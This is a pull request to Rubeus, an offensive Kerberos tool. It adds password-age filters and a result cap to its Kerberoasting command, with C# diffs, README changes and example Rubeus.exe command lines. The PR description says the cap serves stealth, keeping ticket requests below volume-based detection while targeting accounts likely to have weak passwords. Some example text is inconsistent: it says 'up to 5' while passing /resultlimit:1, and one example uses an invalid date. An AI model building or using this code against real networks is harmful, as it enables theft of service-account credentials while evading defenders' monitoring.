### PR TITLE
Adding 3 new options to the kerberoast command

### DIFF
--- a/README.md
+++ b/README.md
@@ -136,8 +136,8 @@ Rubeus is licensed under the BSD 3-Clause license.
         Perform "opsec" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
             Rubeus.exe kerberoast /rc4opsec
 
-        Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 02-29-2010, returning up to 5 service tickets:
-            Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:02-29-2010 /resultlimit:1
+        Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
+            Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:1
 
         Perform AES Kerberoasting:
             Rubeus.exe kerberoast /aes

--- a/README.md
+++ b/README.md
@@ -136,6 +136,9 @@ Rubeus is licensed under the BSD 3-Clause license.
         Perform "opsec" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
             Rubeus.exe kerberoast /rc4opsec
 
+        Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 02-29-2010, returning up to 5 service tickets:
+            Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:02-29-2010 /resultlimit:1
+
         Perform AES Kerberoasting:
             Rubeus.exe kerberoast /aes
 
@@ -1659,6 +1662,12 @@ If the `/rc4opsec` flag is specified, the **tgtdeleg** trick is used, and accoun
 
 If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with `/creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD`.
 
+If the `/pwdsetafter:MM-dd-yyyy` flag is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.
+
+If the `/pwdsetbefore:MM-dd-yyyy` flag is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.
+
+If the `/resultlimit:NUMBER` flag is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
+
 #### kerberoasting opsec
 
 Here is a table comparing the behavior of various flags from an opsec perspective:
@@ -1671,6 +1680,9 @@ Here is a table comparing the behavior of various flags from an opsec perspectiv
 | **/rc4opsec** | Use the **tgtdeleg** trick, enumerate accounts _without_ AES enabled, roast w/ RC4 specified |
 | **/aes** | Enumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting method, roast w/ highest supported encryption |
 | **/aes /tgtdeleg** | Use the **tgtdeleg** trick, enumerate accounts with AES enabled, roast w/ AES specified |
+| **/pwdsetafter:X** | Use the supplied date and only enumerate accounts with password last changed after that date |
+| **/pwdsetbefore:X** | Use the supplied date and only enumerate accounts with password last changed before that date |
+| **/resultlimit:X** | Use the specified number to limit the accounts that will be roasted |
 
 Kerberoasting all users in the current domain:
 

--- a/Rubeus/Commands/Kerberoast.cs
+++ b/Rubeus/Commands/Kerberoast.cs
@@ -19,6 +19,9 @@ namespace Rubeus.Commands
             string supportedEType = "rc4";
             bool useTGTdeleg = false;
             KRB_CRED TGT = null;
+            string pwdSetAfter = "";
+            string pwdSetBefore = "";
+            int resultLimit = 0;
 
             if (arguments.ContainsKey("/spn"))
             {
@@ -77,6 +80,21 @@ namespace Rubeus.Commands
                 useTGTdeleg = true;
             }
 
+            if (arguments.ContainsKey("/pwdsetafter"))
+            {
+                pwdSetAfter = arguments["/pwdsetafter"];
+            }
+
+            if (arguments.ContainsKey("/pwdsetbefore"))
+            {
+                pwdSetBefore = arguments["/pwdsetbefore"];
+            }
+
+            if (arguments.ContainsKey("/resultlimit"))
+            {
+                resultLimit = Convert.ToInt32(arguments["/resultlimit"]);
+            }
+
             if (arguments.ContainsKey("/creduser"))
             {
                 if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase))
@@ -99,11 +117,11 @@ namespace Rubeus.Commands
 
                 System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);
 
-                Roast.Kerberoast(spn, user, OU, domain, dc, cred, outFile, TGT, useTGTdeleg, supportedEType);
+                Roast.Kerberoast(spn, user, OU, domain, dc, cred, outFile, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, resultLimit);
             }
             else
             {
-                Roast.Kerberoast(spn, user, OU, domain, dc, null, outFile, TGT, useTGTdeleg, supportedEType);
+                Roast.Kerberoast(spn, user, OU, domain, dc, null, outFile, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, resultLimit);
             }
         }
     }

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -93,6 +93,9 @@ Roasting:
     Perform ""opsec"" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
         Rubeus.exe kerberoast /rc4opsec
 
+    Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 02-29-2010, returning up to 5 service tickets:
+        Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:02-29-2010 /resultlimit:1
+        
     Perform AES Kerberoasting:
         Rubeus.exe kerberoast /aes
 

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -93,8 +93,8 @@ Roasting:
     Perform ""opsec"" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
         Rubeus.exe kerberoast /rc4opsec
 
-    Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 02-29-2010, returning up to 5 service tickets:
-        Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:02-29-2010 /resultlimit:1
+    Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
+        Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:1
         
     Perform AES Kerberoasting:
         Rubeus.exe kerberoast /aes

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -513,6 +513,8 @@ namespace Rubeus
                         string samAccountName = user.Properties["samAccountName"][0].ToString();
                         string distinguishedName = user.Properties["distinguishedName"][0].ToString();
                         string servicePrincipalName = user.Properties["servicePrincipalName"][0].ToString();
+                        long lastPwdSet = (long)(user.Properties["pwdlastset"][0]);
+                        DateTime pwdLastSet = DateTime.FromFileTimeUtc(lastPwdSet);
                         Interop.SUPPORTED_ETYPE supportedETypes = (Interop.SUPPORTED_ETYPE)0;
                         if (user.Properties.Contains("msDS-SupportedEncryptionTypes"))
                         {
@@ -521,6 +523,7 @@ namespace Rubeus
                         Console.WriteLine("\r\n[*] SamAccountName         : {0}", samAccountName);
                         Console.WriteLine("[*] DistinguishedName      : {0}", distinguishedName);
                         Console.WriteLine("[*] ServicePrincipalName   : {0}", servicePrincipalName);
+                        Console.WriteLine("[*] PwdLastSet             : {0}", pwdLastSet);
                         Console.WriteLine("[*] Supported ETypes       : {0}", supportedETypes);
 
                         if (!String.IsNullOrEmpty(domain))

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -264,7 +264,7 @@ namespace Rubeus
             }
         }
 
-        public static void Kerberoast(string spn = "", string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4")
+        public static void Kerberoast(string spn = "", string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4", string pwdSetAfter = "", string pwdSetBefore = "", int resultLimit = 0)
         {
             Console.WriteLine("\r\n[*] Action: Kerberoasting\r\n");
 
@@ -460,10 +460,29 @@ namespace Rubeus
                     //  But apparently Microsoft is silly and doesn't really follow their own docs and RC4 is always returned regardless ¯\_(ツ)_/¯
                     //      so this fine-grained filtering is not needed
 
-
-                    // samAccountType=805306368                                 ->  user account
-                    // serviceprincipalname=*                                   ->  non-null SPN
-                    string userSearchFilter = String.Format("(&(samAccountType=805306368)(servicePrincipalName=*){0}{1})", userFilter, encFilter);
+                    string userSearchFilter = "";
+                    if (!(String.IsNullOrEmpty(pwdSetAfter) & String.IsNullOrEmpty(pwdSetBefore)))
+                    {
+                        if (String.IsNullOrEmpty(pwdSetAfter))
+                        {
+                            // first LDAP timestamp
+                            pwdSetAfter = "01-01-1601";
+                        }
+                        if (String.IsNullOrEmpty(pwdSetBefore))
+                        {
+                            // arbirary future date
+                            pwdSetBefore = "01-01-2100";
+                        }
+                        Console.WriteLine("[*] Searching for accounts with lastpwdset from "+pwdSetAfter+" to "+ pwdSetBefore);
+                        DateTime timeFromConverted = DateTime.ParseExact(pwdSetAfter, "MM-dd-yyyy", null);
+                        DateTime timeUntilConverted = DateTime.ParseExact(pwdSetBefore, "MM-dd-yyyy", null);
+                        string timePeriod = "(pwdlastset>=" + timeFromConverted.ToFileTime() + ")(pwdlastset<=" + timeUntilConverted.ToFileTime() + ")";
+                        userSearchFilter = String.Format("(&(samAccountType=805306368)(servicePrincipalName=*){0}{1}{2})", userFilter, encFilter, timePeriod);
+                    }
+                    else
+                    {
+                        userSearchFilter = String.Format("(&(samAccountType=805306368)(servicePrincipalName=*){0}{1})", userFilter, encFilter);
+                    }
                     userSearcher.Filter = userSearchFilter;
                 }
                 catch (Exception ex)
@@ -474,6 +493,12 @@ namespace Rubeus
 
                 try
                 {
+                    if (resultLimit > 0)
+                    {
+                        userSearcher.SizeLimit = resultLimit;
+                        Console.WriteLine("[*] Up to {0} result(s) will be returned", resultLimit.ToString());
+                    }
+
                     SearchResultCollection users = userSearcher.FindAll();
 
                     if (users.Count == 0)

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -465,12 +465,10 @@ namespace Rubeus
                     {
                         if (String.IsNullOrEmpty(pwdSetAfter))
                         {
-                            // first LDAP timestamp
                             pwdSetAfter = "01-01-1601";
                         }
                         if (String.IsNullOrEmpty(pwdSetBefore))
                         {
-                            // arbirary future date
                             pwdSetBefore = "01-01-2100";
                         }
                         Console.WriteLine("[*] Searching for accounts with lastpwdset from "+pwdSetAfter+" to "+ pwdSetBefore);


### PR DESCRIPTION
Hi,

I have added the following options to the `kerberoast` command:
- /pwdsetafter
- /pwdsetbefore
- /resultlimit

The first two options allow the user to target accounts whose password was last changed between the specified dates. This is based on the same logic that BloodHound uses to short kerberoastable users.

The third option enables the user to add a limit to the number of accounts that will be targeted. Since most detection methods are based on the number of tickets requested within a specific time, this option can be used to limit results and allow for a stealthier approach.

Combining all the above will ensure a high success rate of finding a service with a weak password while keeping the number of requests low.